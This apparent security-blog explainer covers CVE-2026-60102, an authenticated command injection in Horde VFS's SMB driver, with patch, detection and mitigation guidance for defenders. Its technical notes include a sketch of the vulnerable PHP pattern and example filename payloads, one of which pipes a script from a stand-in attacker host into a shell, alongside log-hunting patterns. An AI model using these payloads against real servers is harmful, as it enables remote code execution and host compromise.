eastbaycyber

CVE-2026-60102: Horde VFS SMB Command Injection

CVE explainers 10 min read
SR
Security Research Desk Expert reviewed
Threat intelligence · Human-verified · Updated 2026-07-08
▲ Escalation ViewOne CVE, briefed at three altitudes — skim the Brief, weigh the Impact, or work the Runbook. The way a SOC actually reads it.
CISOBrief · 30-second brief

TL;DR - Horde VFS before 3.0.1 contains an authenticated OS command injection in the SMB driver. - Any deployment using Horde_Vfs_Smb should upgrade to 3.0.1 and review logs for suspicious filenames. - No confirmed in-the-wild exploitation is cited in current sources, but patch quickly due to RCE impact.

Vulnerability at a Glance

Field Value
CVE ID CVE-2026-60102
CVSS 8.8 (High)
Attack vector Network, via authenticated file operations
Privileges required Yes, authenticated attacker
Patch available Yes, fixed in 3.0.1

CVE-2026-60102 affects the Horde Virtual File System (VFS) API, specifically the SMB backend driver. The vulnerability allows an authenticated attacker to inject arbitrary shell commands through crafted filenames that reach a shell execution path before smbclient is invoked. In practice, this turns routine file-management actions into a code execution vector on the Horde host.

For defenders, the quick decision point is simple: if your environment runs Horde VFS with the SMB driver and the installed version is before 3.0.1, treat it as exposed until upgraded. The vulnerability is especially important in shared environments where multiple authenticated users can upload, rename, create, or delete files through Horde-connected workflows.

What Is This Vulnerability?

The root cause is an OS command injection flaw in the Horde_Vfs_Smb driver. According to the published vulnerability description, the _escapeShellCommand() method fails to sanitize command substitution sequences in attacker-controlled filenames. That matters because the data is later interpolated into a double-quoted shell context, where shell expansion behavior can still occur depending on how the string is passed to the underlying shell.

The vulnerable execution path reaches proc_open() through /bin/sh -c before smbclient runs. This is the critical technical detail. Once untrusted input is placed into a shell command line and executed through /bin/sh -c, a failure to neutralize shell metacharacters or substitution syntax can become host-level command execution. The issue is not merely a malformed input bug in the application layer; it is a shell invocation bug with direct operating system impact.

An authenticated attacker can trigger the flaw using normal file actions that accept user-controlled names. The supplied technical context explicitly identifies file upload, folder creation, rename, and deletion as potential trigger points. That means an attacker does not necessarily need a special admin-only path; they may only need ordinary application access plus a path that uses the SMB-backed VFS driver.

Technical Notes

The vulnerable pattern, based on the CVE description, is conceptually similar to building a shell command with untrusted filename input:

$cmd = 'smbclient ... "' . $filename . '"';
proc_open('/bin/sh -c ' . $cmd, $descriptorspec, $pipes);

If filename escaping does not neutralize shell substitution forms, payloads embedded in a filename may survive quoting:

$(id)
`id`
$(curl attacker.example/p.sh|sh)

Defenders should not assume the exact payloads above were observed in the wild. They are examples of the command substitution class described in the CVE and are useful for detection engineering and validation in a lab.

AnalystImpact · assess the risk

Who Is Affected?

The affected product is Horde Virtual File System (VFS) API. The vulnerable version range is explicitly stated as before 3.0.1. The fixed version is 3.0.1. Based on the available source set, that is the only version boundary that can be stated with confidence, and practitioners should avoid guessing at narrower unaffected subranges.

The key operational qualifier is the use of the SMB backend driver, Horde_Vfs_Smb. If your Horde deployment does not use the SMB VFS driver, the specific vulnerable code path described in the CVE may not be reachable in your environment. However, if you do use SMB-backed file operations in Horde and are running any version earlier than 3.0.1, you should assume exposure until verified otherwise.

This distinction matters for risk prioritization. A package inventory that shows Horde VFS installed is not enough by itself; defenders should also determine whether the deployment actually invokes the SMB driver in production. Still, because version 3.0.1 is the fixed release, the safest path is to standardize on that version or later rather than rely on partial compensating assumptions.

Technical Notes

To identify installed Horde VFS package versions in a PHP/Composer-based deployment, start with:

composer show | grep -i horde
composer show horde/vfs

On systems where the application is deployed from a lockfile or vendor tree, verify the resolved version:

grep -A3 '"name": "horde/vfs"' composer.lock

If your team maintains direct source checkouts, confirm whether the fixed commit is present:

git log --oneline --decorate --grep 41f74b4acfc144e09013d04dd121e0a5da808361
git rev-parse HEAD

CVSS Score Breakdown

The reported base score is 8.8, which places this issue in the High severity range. The exact CVSS vector was not returned in the provided NVD tool output, so defenders should avoid assuming precise metric values beyond what the published description supports. Still, the score is consistent with a network-reachable, authenticated command injection that can lead to significant system compromise.

Why the score is high is straightforward. The attack can be initiated over the network through application functionality, the attacker only needs valid authenticated access, and successful exploitation can result in arbitrary shell command execution on the host running Horde. That creates potential for confidentiality, integrity, and availability impact well beyond a single file operation or user session.

The main moderating factor appears to be Privileges Required, since the CVE description says the attacker must be authenticated. In many real environments, that lowers broad internet-scale exploitability but does not meaningfully reduce risk for multi-user portals, internal collaboration systems, exposed webmail suites, or environments where low-privileged users can obtain access legitimately or through credential abuse.

Technical Notes

Because the full vector is unavailable from the supplied data, defenders should reason from the disclosed characteristics instead of reconstructing a speculative vector. A practical interpretation is:

  • Attack Vector: network-accessible through application workflows
  • Privileges Required: authenticated user
  • Impact: high, because arbitrary shell command execution can compromise the host

In the absence of the exact vector string, prioritize remediation based on impact and reachable attack surface rather than debating score decimals.

Exploitation Status

Based on the supplied sources, there is no confirmed in-the-wild exploitation at this time. The CVE is not listed in CISA KEV, which means there is no CISA-tracked evidence of active exploitation from the materials provided. That is useful context, but it should not be mistaken for proof of safety. High-severity authenticated command injection flaws often become attractive once patch diffs are public.

There is also no verified public PoC identified in the source set provided here. However, there is a public fix commit, a public pull request, and a public tagged release for 3.0.1. That means researchers and adversaries alike may be able to infer exploitability from the code changes. In practice, defenders should assume the barrier to creating a PoC is moderate, not prohibitive.

The right operational statement is therefore: patch is available, public patch lineage exists, no verified PoC was identified from current sources, and no confirmed in-the-wild exploitation is cited in the provided references. If you are exposed, do not wait for proof of exploitation before acting.

Technical Notes

Operationally relevant references include:

Fixed commit: 41f74b4acfc144e09013d04dd121e0a5da808361
Pull request: horde/Vfs PR #10
Fixed release: v3.0.1
KEV status: not listed in supplied data

If your threat intel process depends on exploit confirmation, document the present state as unconfirmed rather than not exploitable.

ResponderRunbook · act now

How to Detect It

Detection should focus on two things: suspicious filenames and unexpected shell execution related to Horde or smbclient activity. Because the bug is triggered through user-controlled file operations, the best evidence may appear in application logs, web server logs, audit logs, process execution telemetry, or EDR traces rather than in a network IDS alone.

The filename aspect is particularly important. The CVE specifically describes command substitution sequences surviving inadequate sanitization. That means security teams should search for filenames or path elements containing shell substitution syntax such as $(, backticks, or similarly suspicious shell metacharacter combinations in request parameters, audit events, or backend error logs related to upload, create, rename, or delete operations.

A second detection angle is process lineage. A Horde/PHP worker spawning /bin/sh -c and then smbclient in close sequence is worth scrutiny, especially if command lines contain shell metacharacters, failed quoting, or unexpected outbound network activity. In mature environments, EDR or Linux audit telemetry can often reveal this chain even if the application itself logs only the user-facing operation.

Technical Notes

Example grep patterns for application or web logs:

grep -R -E '\$\(|`[^`]+`' /var/log/httpd /var/log/apache2 /var/log/nginx /var/log/php* 2>/dev/null

If you centralize web logs, search request parameters associated with file operations for shell syntax. A generic Splunk example:

index=web (upload OR rename OR delete OR mkdir)
("|" OR "$(" OR "`")
| table _time, src, user, uri, http_method, status, user_agent

Example Elastic/KQL-style hunting query for suspicious filename indicators:

url.query:*"$("* or url.query:*"`"* or message:*"$("* or message:*"`"*

Example Linux process hunting with auditd or EDR-style telemetry:

ausearch -m EXECVE -i | egrep 'php|apache|httpd|nginx|smbclient|/bin/sh'

Look for command lines where a web server or PHP process launches /bin/sh -c before smbclient. A suspicious lineage pattern would resemble:

php-fpm -> /bin/sh -c <constructed smbclient command> -> smbclient

If you do not currently log filename-level events for Horde file operations, assume low visibility and prioritize patching plus temporary hardening.

Mitigation and Patching

The primary mitigation is to upgrade Horde VFS to version 3.0.1. The fixed version is explicitly identified in the available sources, and the remediation is traceable to upstream commit 41f74b4acfc144e09013d04dd121e0a5da808361 and the v3.0.1 release. For most environments, upgrading is the only complete fix because the root cause is in how the SMB driver handles shell-escaped filenames before invoking the shell.

If you cannot patch immediately, reduce exposure by limiting or disabling use of the Horde_Vfs_Smb backend where feasible. Because the vulnerability requires authentication and is triggered through file-management operations, another partial mitigation is to restrict who can perform uploads, renames, deletes, or directory creation through the affected interface. These are stopgaps, not substitutes for upgrading, because they do not remove the vulnerable code path if a permitted user is malicious or compromised.

A further defense-in-depth measure is to review the runtime account used by Horde and ensure it has the minimum possible OS privileges. Since exploitation can lead to shell command execution on the host, containment depends heavily on what that service account can access, execute, and reach on the network.

Technical Notes

Composer-based upgrade example:

composer require horde/vfs:^3.0.1
composer update horde/vfs

If your environment pins dependencies from composer.lock, verify the resolved version after update:

composer show horde/vfs

For source-based deployments using Git, move to the fixed release or a commit containing the fix:

git fetch --tags
git checkout v3.0.1

If immediate upgrade is not possible, consider temporarily disabling SMB-backed VFS usage in your application configuration until you can patch. The exact configuration location may vary by deployment, so do not apply blind changes in production without validating your Horde-specific config management process. At a minimum, document and enforce a temporary control such as:

- Disable features that use Horde_Vfs_Smb
- Restrict affected file operations to trusted admins only
- Monitor for suspicious filenames and /bin/sh -> smbclient execution

After patching, perform a targeted review for prior exploitation attempts and validate that suspicious filenames no longer trigger shell execution. Patch deployment should be followed by log review and, where available, host-level process telemetry review.

References

The most authoritative reference for defenders is the NVD entry, which contains the vulnerability description and links to upstream remediation artifacts. It establishes that the flaw affects Horde Virtual File System (VFS) API before 3.0.1 and identifies the vulnerable component as the SMB driver. That record should be your baseline for ticketing, exposure assessment, and change control notes.

The upstream fix references are equally important because they confirm patch lineage and fixed release details. The GitHub commit, pull request, and release tag provide the evidence chain needed for engineering teams to validate that they are deploying the correct version. The Horde component page is also useful for product verification when teams need to map package names to business-owned applications.

Technical Notes

References used in this article:

If you’re looking for more information on related vulnerabilities, check out our articles on CVE-2026-12485 and FAQ on Container Escape Vulnerability.

This article may contain affiliate links. We earn a commission on qualifying purchases at no extra cost to you. ```

Last verified: 2026-07-08

Disclaimer: This article may contain affiliate links. We earn a commission on qualifying purchases at no extra cost to you.